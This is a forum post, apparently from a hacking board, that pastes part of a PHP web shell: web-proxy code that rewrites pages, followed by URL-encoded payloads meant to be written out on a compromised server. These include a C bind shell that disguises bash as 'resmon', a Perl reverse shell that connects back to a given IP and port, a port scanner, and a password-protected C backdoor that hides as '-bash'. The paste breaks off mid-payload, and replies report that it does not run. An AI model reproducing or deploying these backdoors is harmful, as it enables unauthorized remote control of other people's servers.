complete_url($matches[1]) . '"', $_response_headers['p3p'][0]); } if (isset($_response_headers['refresh']) && preg_match('#([0-9\s]*;\s*URL\s*=)\s*(\S*)#i', $_response_headers['refresh'][0], $matches)) { $_response_headers['refresh'][0] = $matches[1] . complete_url($matches[2]); } if (isset($_response_headers['location'])) { $_response_headers['location'][0] = complete_url($_response_headers['location'][0]); } if (isset($_response_headers['uri'])) { $_response_headers['uri'][0] = complete_url($_response_headers['uri'][0]); } if (isset($_response_headers['content-location'])) { $_response_headers['content-location'][0] = complete_url($_response_headers['content-location'][0]); } if (isset($_response_headers['connection'])) { unset($_response_headers['connection'], $_response_keys['connection']); } if (isset($_response_headers['keep-alive'])) { unset($_response_headers['keep-alive'], $_response_keys['keep-alive']); } if ($_response_code == 401 && isset($_response_headers['www-authenticate']) && preg_match('#basic\s+(?:realm="(.*?)")?#i', $_response_headers['www-authenticate'][0], $matches)) { if (isset($_auth_creds[$matches[1]]) && !$_quit) { $_basic_auth_realm = $matches[1]; $_basic_auth_header = ''; $_retry = $_quit = true; } else { show_report(array('which' => 'index', 'category' => 'auth', 'realm' => $matches[1])); } } } while ($_retry); if (!isset($_proxify[$_content_type])) { @set_time_limit(0); $_response_keys['content-disposition'] = 'Content-Disposition'; $_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . '"' : $_content_disp; if ($_content_length !== false) { if ($_config['max_file_size'] != -1 && $_content_length > $_config['max_file_size']) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'file_size')); } $_response_keys['content-length'] = 'Content-Length'; $_response_headers['content-length'][0] = $_content_length; } $_response_headers = array_filter($_response_headers); $_response_keys = array_filter($_response_keys); header(array_shift($_response_keys)); array_shift($_response_headers); foreach ($_response_headers as $name => $array) { foreach ($array as $value) { header($_response_keys[$name] . ': ' . $value, false); } } do { $data = fread($_socket, 8192); echo $data; } while (isset($data{0})); fclose($_socket); exit(0); } do { $data = @fread($_socket, 8192); $_response_body .= $data; } while (isset($data{0})); unset($data); fclose($_socket); if ($_content_type == 'text/css') { $_response_body = proxify_css($_response_body); } else { if ($_flags['strip_title']) { $_response_body = preg_replace('#(<\s*title[^>]*>)(.*?)(<\s*/title[^>]*>)#is', '$1$3', $_response_body); } if ($_flags['remove_scripts']) { $_response_body = preg_replace('#<\s*script[^>]*?>.*?<\s*/\s*script\s*>#si', '', $_response_body); $_response_body = preg_replace("#(\bon[a-z]+)\s*=\s*(?:\"([^\"]*)\"?|'([^']*)'?|([^'\"\s>]*))?#i", '', $_response_body); $_response_body = preg_replace('#<noscript>(.*?)</noscript>#si', "$1", $_response_body); } if (!$_flags['show_images']) { $_response_body = preg_replace('#<(img|image)[^>]*?>#si', '', $_response_body); } $tags = array ( 'a' => array('href'), 'img' => array('src', 'longdesc'), 'image' => array('src', 'longdesc'), 'body' => array('background'), 'base' => array('href'), 'frame' => array('src', 'longdesc'), 'iframe' => array('src', 'longdesc'), 'head' => array('profile'), 'layer' => array('src'), 'input' => array('src', 'usemap'), 'form' => array('action'), 'area' => array('href'), 'link' => array('href', 'src', 'urn'), 'meta' => array('content'), 'param' => array('value'), 'applet' => array('codebase', 'code', 'object', 'archive'), 'object' => array('usermap', 'codebase', 'classid', 'archive', 'data'), 'script' => array('src'), 'select' => array('src'), 'hr' => array('src'), 'table' => array('background'), 'tr' => array('background'), 'th' => array('background'), 'td' => array('background'), 'bgsound' => array('src'), 'blockquote' => array('cite'), 'del' => array('cite'), 'embed' => array('src'), 'fig' => array('src', 'imagemap'), 'ilayer' => array('src'), 'ins' => array('cite'), 'note' => array('src'), 'overlay' => array('src', 'imagemap'), 'q' => array('cite'), 'ul' => array('src') ); preg_match_all('#(<\s*style[^>]*>)(.*?)(<\s*/\s*style[^>]*>)#is', $_response_body, $matches, PREG_SET_ORDER); for ($i = 0, $count_i = count($matches); $i < $count_i; ++$i) { $_response_body = str_replace($matches[$i][0], $matches[$i][1]. proxify_css($matches[$i][2]) .$matches[$i][3], $_response_body); } preg_match_all("#<\s*([a-zA-Z\?-]+)([^>]+)>#S", $_response_body, $matches); for ($i = 0, $count_i = count($matches[0]); $i < $count_i; ++$i) { if (!preg_match_all("#([a-zA-Z\-\/]+)\s*(?:=\s*(?:\"([^\">]*)\"?|'([^'>]*)'?|([^'\"\s]*)))?#S", $matches[2][$i], $m, PREG_SET_ORDER)) { continue; } $rebuild = false; $extra_html = $temp = ''; $attrs = array(); for ($j = 0, $count_j = count($m); $j < $count_j; $attrs[strtolower($m[$j][1])] = (isset($m[$j][4]) ? $m[$j][4] : (isset($m[$j][3]) ? $m[$j][3] : (isset($m[$j][2]) ? $m[$j][2] : false))), ++$j); if (isset($attrs['style'])) { $rebuild = true; $attrs['style'] = proxify_inline_css($attrs['style']); } $tag = strtolower($matches[1][$i]); if (isset($tags[$tag])) { switch ($tag) { case 'a': if (isset($attrs['href'])) { $rebuild = true; $attrs['href'] = complete_url($attrs['href']); } break; case 'img': if (isset($attrs['src'])) { $rebuild = true; $attrs['src'] = complete_url($attrs['src']); } if (isset($attrs['longdesc'])) { $rebuild = true; $attrs['longdesc'] = complete_url($attrs['longdesc']); } break; case 'form': if (isset($attrs['action'])) { $rebuild = true; if (trim($attrs['action']) === '') { $attrs['action'] = $_url_parts['path']; } if (!isset($attrs['method']) || strtolower(trim($attrs['method'])) === 'get') { $extra_html = '<input type="hidden" name="' . $_config['get_form_name'] . '" value="' . encode_url(complete_url($attrs['action'], false)) . '" />'; $attrs['action'] = ''; break; } $attrs['action'] = complete_url($attrs['action']); } break; case 'base': if (isset($attrs['href'])) { $rebuild = true; url_parse($attrs['href'], $_base); $attrs['href'] = complete_url($attrs['href']); } break; case 'meta': if ($_flags['strip_meta'] && isset($attrs['name'])) { $_response_body = str_replace($matches[0][$i], '', $_response_body); } if (isset($attrs['http-equiv'], $attrs['content']) && preg_match('#\s*refresh\s*#i', $attrs['http-equiv'])) { if (preg_match('#^(\s*[0-9]*\s*;\s*url=)(.*)#i', $attrs['content'], $content)) { $rebuild = true; $attrs['content'] = $content[1] . complete_url(trim($content[2], '"\'')); } } break; case 'head': if (isset($attrs['profile'])) { $rebuild = true; $attrs['profile'] = implode(' ', array_map('complete_url', explode(' ', $attrs['profile']))); } break; case 'applet': if (isset($attrs['codebase'])) { $rebuild = true; $temp = $_base; url_parse(complete_url(rtrim($attrs['codebase'], '/') . '/', false), $_base); unset($attrs['codebase']); } if (isset($attrs['code']) && strpos($attrs['code'], '/') !== false) { $rebuild = true; $attrs['code'] = complete_url($attrs['code']); } if (isset($attrs['object'])) { $rebuild = true; $attrs['object'] = complete_url($attrs['object']); } if (isset($attrs['archive'])) { $rebuild = true; $attrs['archive'] = implode(',', array_map('complete_url', preg_split('#\s*,\s*#', $attrs['archive']))); } if (!empty($temp)) { $_base = $temp; } break; case 'object': if (isset($attrs['usemap'])) { $rebuild = true; $attrs['usemap'] = complete_url($attrs['usemap']); } if (isset($attrs['codebase'])) { $rebuild = true; $temp = $_base; url_parse(complete_url(rtrim($attrs['codebase'], '/') . '/', false), $_base); unset($attrs['codebase']); } if (isset($attrs['data'])) { $rebuild = true; $attrs['data'] = complete_url($attrs['data']); } if (isset($attrs['classid']) && !preg_match('#^clsid:#i', $attrs['classid'])) { $rebuild = true; $attrs['classid'] = complete_url($attrs['classid']); } if (isset($attrs['archive'])) { $rebuild = true; $attrs['archive'] = implode(' ', array_map('complete_url', explode(' ', $attrs['archive']))); } if (!empty($temp)) { $_base = $temp; } break; case 'param': if (isset($attrs['valuetype'], $attrs['value']) && strtolower($attrs['valuetype']) == 'ref' && preg_match('#^[\w.+-]+://#', $attrs['value'])) { $rebuild = true; $attrs['value'] = complete_url($attrs['value']); } break; case 'frame': case 'iframe': if (isset($attrs['src'])) { $rebuild = true; $attrs['src'] = complete_url($attrs['src']) . '&nf=1&go=proxyx'; } if (isset($attrs['longdesc'])) { $rebuild = true; $attrs['longdesc'] = complete_url($attrs['longdesc']); } break; default: foreach ($tags[$tag] as $attr) { if (isset($attrs[$attr])) { $rebuild = true; $attrs[$attr] = complete_url($attrs[$attr]); } } break; } } if ($rebuild) { $new_tag = "<$tag"; foreach ($attrs as $name => $value) { $delim = strpos($value, '"') && !strpos($value, "'") ? "'" : '"'; $new_tag .= ' ' . $name . ($value !== false ? '=' . $delim . $value . $delim : ''); } $_response_body = str_replace($matches[0][$i], $new_tag . '>' . $extra_html, $_response_body); } } if ($_flags['include_form'] && !isset($_GET['nf'])) { $_url_form = '<div style="width:100%;margin:0;text-align:center;border-bottom:1px solid #725554;color:#000000;background-color:#F2FDF3;font-size:12px;font-weight:bold;font-family:Bitstream Vera Sans,arial,sans-serif;padding:4px;">' . '<form method="post" action="' . $_script_url . '?go=proxyx">' . ' <label for="____' . $_config['url_var_name'] . '"><a href="' . $_url . '">Address</a>:</label> <input id="____' . $_config['url_var_name'] . '" type="text" size="80" name="' . $_config['url_var_name'] . '" value="' . $_url . '" />' . ' <input type="submit" name="go" value="Go" />' . ' [go: <a href="' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_url_parts['prev_dir']) .' ">up one dir</a>, <a href="' . $_script_base . '">main page</a>]' . '<br /><hr />'; foreach ($_flags as $flag_name => $flag_value) { if (!$_frozen_flags[$flag_name]) { $_url_form .= '<label><input type="checkbox" name="' . $_config['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' /> ' . $_labels[$flag_name][0] . '</label> '; } } $_url_form .= '</form></div>'; $_response_body = preg_replace('#\<\s*body(.*?)\>#si', "$0\n$_url_form" , $_response_body, 1); } } $_response_keys['content-disposition'] = 'Content-Disposition'; $_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . '"' : $_content_disp; $_response_keys['content-length'] = 'Content-Length'; $_response_headers['content-length'][0] = strlen($_response_body); $_response_headers = array_filter($_response_headers); $_response_keys = array_filter($_response_keys); header(array_shift($_response_keys)); array_shift($_response_headers); foreach ($_response_headers as $name => $array) { foreach ($array as $value) { header($_response_keys[$name] . ': ' . $value, false); } } echo $_response_body; exit();}/* Nub servers now disable base64, So we'll use URLEncode, they disable that then i'll make my own encryption */$backdoor_c = "%23include%20%3Casm%2Fioctls.h%3E%0A%23include%20%3Csys%2Ftime.h%3E%0A%23include%20%3Csys%2Fselect.h%3E%0A%23include%20%3Cstdlib.h%3E%0A%23include%20%3Cunistd.h%3E%0A%23include%20%3Cerrno.h%3E%0A%23include%20%3Cstring.h%3E%0A%23include%20%3Cnetdb.h%3E%0A%23include%20%3Csys%2Ftypes.h%3E%0A%23include%20%3Cnetinet%2Fin.h%3E%0A%23include%20%3Csys%2Fsocket.h%3E%0A%23include%20%3Cstdint.h%3E%0A%23include%20%3Cpthread.h%3E%0Avoid%20*ClientHandler(void%20*client)%7B%0Aint%20fd%20%3D%20(int)client%3B%0Adup2(fd%2C%200)%3B%0Adup2(fd%2C%201)%3B%0Adup2(fd%2C%202)%3B%0Aif(fork()%20%3D%3D%200)%0Aexecl(%22%2Fbin%2Fbash%22%2C%20%22resmon%22%2C%200)%3B%0Aclose(fd)%3B%0Areturn%200%3B%0A%7D%0Aint%20main(int%20argc%2C%20char%20*argv%5B%5D)%0A%7B%0Aint%20rsk%2C%20csk%2C%20i%20%3D%201%3B%0Apthread_t%20thread%3B%0Astruct%20sockaddr%20saddr%3B%0Astruct%20sockaddr_in%20saddrIn%3B%0Aint%20p%3Datoi(argv%5B1%5D)%3B%0Aif((rsk%20%3D%20socket(AF_INET%2C%20SOCK_STREAM%2C%20IPPROTO_TCP))%20%3D%3D%20-1)%0Areturn%20-1%3B%0AsaddrIn.sin_family%09%09%3D%20AF_INET%3B%0AsaddrIn.sin_addr.s_addr%09%3D%20INADDR_ANY%3B%0AsaddrIn.sin_p%09%09%3D%20htons(p)%3B%0Amemcpy(%26saddr%2C%20%26saddrIn%2C%20sizeof(struct%20sockaddr_in))%3B%0Asetsockopt(rsk%2C%20SOL_SOCKET%2C%20SO_REUSEADDR%2C%20(char%20*)%26i%2C%20sizeof(i))%3B%0Aif(bind(rsk%2C%20%26saddr%2C%20sizeof(saddr))%20!%3D%200)%7B%0Aclose(rsk)%3B%0Areturn%20-1%3B%0A%7D%0Aif(listen(rsk%2C%2010)%20%3D%3D%20-1)%7B%0Aclose(rsk)%3B%0Areturn%20-1%3B%0A%7D%0Awhile(1)%7B%0Aif((csk%20%3D%20accept(rsk%2C%20NULL%2C%20NULL))%20!%3D%20-1)%7B%0Apthread_create(%26thread%2C%200%2C%20handler%2C%20(void%20*)csk)%3B%0A%7D%0A%7D%0Areturn%201%3B%0A%7D";$backdoor_perl = "%23!%2Fusr%2Fbin%2Fperl%0Ause%20Socket%3B%0Amy%20(%24iaddr%2C%24port%2C%24cmd)%3D%40ARGV%3B%0Amy%20%24paddr%3Dsockaddr_in(%24port%2C%20inet_aton(%24iaddr))%3B%0Amy%20%24proto%20%3D%20getprotobyname(%22tcp%22)%3B%0Asocket(SOCKET%2C%20PF_INET%2C%20SOCK_STREAM%2C%20%24proto)%3B%0Aconnect(SOCKET%2C%20%24paddr)%3B%0Aopen(STDOUT%2C%22%3E%26SOCKET%22)%3B%0Aopen(STDIN%2C%22%3E%26SOCKET%22)%3B%0Aprint%20SOCKET%20%22Shell%20test%5Cn%22%3B%0Aprint%20exec(%24cmd)%3B%0Aclose(STDIN)%3B%0Aclose(STDOUT)%3B";$pl_scan = "%23!%2Fusr%2Fbin%2Fperl%0Ause%20warnings%3B%0Ause%20strict%3B%0Ause%20diagnostics%3B%0Ause%20IO%3A%3ASocket%3A%3AINET%3B%0Asub%20usage%0A%7B%0A%09die(%22%240%20host%20startport%20endport%0A%22)%3B%0A%7D%0Ausage%20unless(%40ARGV%3E1)%3B%0Amy(%24host%2C%24s%2C%24e)%3D%40ARGV%3B%0Aforeach(%24s..%24e)%20%7B%0A%09my%20%24sock%3DIO%3A%3ASocket%3A%3AINET-%3Enew%0A%09(%0A%09%09PeerAddr%3D%3E%24host%2C%0A%09%09PeerPort%3D%3E%24_%2C%0A%09%09Proto%3D%3E'tcp'%2C%0A%09%09Timeout%3D%3E2%0A%09)%3B%0A%09print%20%22Port%20%20open%0A%22%20if%20(%24%5Csock)%3B%0A%7D%0A%0A%09";$rk_ovas = "%23include+%3cstdio.h%3e%0d%0a%23include+%3cstdlib.h%3e%0d%0a%23include+%3cerrno.h%3e%0d%0a%23include+%3cstrings.h%3e%0d%0a%23include+%3cnetinet%2fin.h%3e%0d%0a%23include+%3csys%2fsocket.h%3e%0d%0a%23include+%3csys%2ftypes.h%3e%0d%0a%23include+%3csignal.h%3e%0d%0a%23define+PASSAUTH+1+%0d%0a%0d%0a%23define+PORT++++++++++++29369%0d%0a%23define+MSG_WELCOME+++++%22r00t'd%5cn+All+commands+are+followed+by+a+%3b%5cn%22%0d%0a%23define+MSG_PASSWORD++++%22Password%3a+%22%0d%0a%23define+MSG_WRONGPASS+++%22Invalid+password%5cn%22%0d%0a%23define+MSG_OK++++++++++%22Welcome...%5cn%22%0d%0a%23define+MSG_CONTINUE++++%22Do+you+want+to+continue%3f%5cn%22%0d%0a%0d%0a%23define+HIDE++++++++++++%22-bash%22%0d%0a%23define+SHELL+++++++++++%22%2fbin%2fsh%22%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0a++++++++%23define+PASSWD+%22__RAHTPASS__%22%0d%0a%23endif%0d%0a%0d%0aint+main+(int+argc%2c+char+*argv%5b%5d)%3b%0d%0a%23ifdef+PASSAUTH%0d%0aint+login+(int)%3b%0d%0a%23endif%0d%0a%0d%0aint+background()%0d%0a%7b%0d%0aint+pid%3b%0d%0asignal(SIGCHLD%2cSIG_IGN)%3b%0d%0apid+%3d+fork()%3b%0d%0aif(pid%3e0)%0d%0a%7b%0d%0asleep(1)%3b%0d%0aexit(EXIT_SUCCESS)%3b+%0d%0a%7d%0d%0aif(pid%3d%3d0)%0d%0a%7b%0d%0asignal(SIGCHLD%2cSIG_DFL)%3b%0d%0areturn+getpid()%3b%0d%0a%7d%0d%0areturn+-1%3b%0d%0a%7d%0d%0a%0d%0aint%0d%0amain+(int+argc%2c+char+*argv%5b%5d)%0d%0a%7b%0d%0a++++++++int+sockfd%2c+newfd%2c+size%3b%0d%0a++++++++struct+sockaddr_in+local%3b%0d%0a++++++++struct+sockaddr_in+remote%3b%0d%0a++++++++char+cmd%5b256%5d%3b%0d%0a%0d%0a++++++++strcpy+(argv%5b0%5d%2c+HIDE)%3b%0d%0a++++++++signal+(SIGCHLD%2c+SIG_IGN)%3b%0d%0a%0d%0a++++++++bzero+(%26local%2c+sizeof(local))%3b%0d%0a++++++++local.sin_family+%3d+AF_INET%3b%0d%0a++++++++local.sin_port+%3d+htons+(PORT)%3b%0d%0a++++++++local.sin_addr.s_addr+%3d+INADDR_ANY%3b%0d%0a++++++++bzero+(%26(local.sin_zero)%2c+8)%3b%0d%0a%0d%0a++++++++if+((sockfd+%3d+socket(AF_INET%2c+SOCK_STREAM%2c+0))+%3d%3d+-1)+%7b%0d%0a++++++++++++++++perror(%22socket%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(bind+(sockfd%2c+(struct+sockaddr+*)%26local%2c+sizeof(struct+sockaddr))+%3d%3d%0d%0a-1)+%7b%0d%0a++++++++++++++++perror(%22bind%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(listen(sockfd%2c+5)+%3d%3d+-1)+%7b%0d%0a++++++++++++++++perror(%22listen%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a++++++++size+%3d+sizeof(struct+sockaddr_in)%3b%0d%0a++++++++background()%3b%0d%0a++++++++while+(1)+%7b%0d%0a++++++++++++++++if+((newfd+%3d+accept+(sockfd%2c+(struct+sockaddr+*)%26remote%2c+%26size))%0d%0a%3d%3d+-1)+%7b%0d%0a++++++++++++++++++++++++perror+(%22accept%22)%3b%0d%0a++++++++++++++++++++++++exit(1)%3b%0d%0a++++++++++++++++%7d%0d%0a%0d%0a++++++++++++++++if+(!fork+())+%7b%0d%0a++++++++++++++++++++++++send+(newfd%2c+MSG_WELCOME%2c+sizeof(MSG_WELCOME)%2c+0)%3b%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0a++++++++++++++++++++++++if+(login(newfd)+!%3d+1)+%7b%0d%0a++++++++++++++++++++++++++++++++send+(newfd%2c+MSG_WRONGPASS%2c%0d%0asizeof(MSG_WRONGPASS)%2c+0)%3b%0d%0a++++++++++++++++++++++++++++++++close+(newfd)%3b%0d%0a++++++++++++++++++++++++++++++++exit(1)%3b%0d%0a++++++++++++++++++++++++%7d%0d%0a%23endif%0d%0a%0d%0a++++++++++++++++++++++++close+(0)%3b+close(1)%3b+close(2)%3b%0d%0a++++++++++++++++++++++++dup2+(newfd%2c+0)%3b+dup2(newfd%2c+1)%3b+dup2(newfd%2c+2)%3b%0d%0a++++++++++++++++++++++++execl+(SHELL%2c+SHELL%2c+(char+*)0)%3b+close(newfd)%3b%0d%0aexit(0)%3b%0d%0a++++++++++++++++%7d%0d%0a++++++++++++++++close+(newfd)%3b%0d%0a++++++++%7d%0d%0a++++++++return+0%3b%0d%0a%7d%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0aint%0d%0alogin+(int+fd)%0d%0a%7b%0d%0a++++++++char+u_passwd%5b15%5d%3b%0d%0a++++++++int+i%3b%0d%0a%0d%0a++++++++send+(fd%2c+MSG_PASSWORD%2c+sizeof(MSG_PASSWORD)%2c+0)%3b%0d%0a++++++++recv+(fd%2c+u_passwd%2c+sizeof(u_passwd)%2c+0)%3b%0d%0a%0d%0a++++++++for+(i+%3d+0%3b+i+%3c+strlen+(u_passwd)%3b+i%2b%2b)+%7b%0d%0a++++++++++++++++if+(u_passwd%5bi%5d+%3d%3d+'%5cn'+%7c%7c+u_passwd%5bi%5d+%3d%3d+'%5cr')%0d%0a++++++++++++++++u_passwd%5bi%5d+%3d+'%5c0'%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(strcmp+(PASSWD%2c+u_passwd)+%3d%3d+0)+%7 Quote Link to comment Share on other sites More sharing options...
blog789 Posted March 16, 2010 Report Share Posted March 16, 2010 Not running. Quote Link to comment Share on other sites More sharing options...
raid Posted September 14, 2011 Report Share Posted September 14, 2011 hi Not running. Quote Link to comment Share on other sites More sharing options...
CristianRoflmao Posted September 16, 2011 Report Share Posted September 16, 2011 nu merge ma ! ... Quote Link to comment Share on other sites More sharing options...
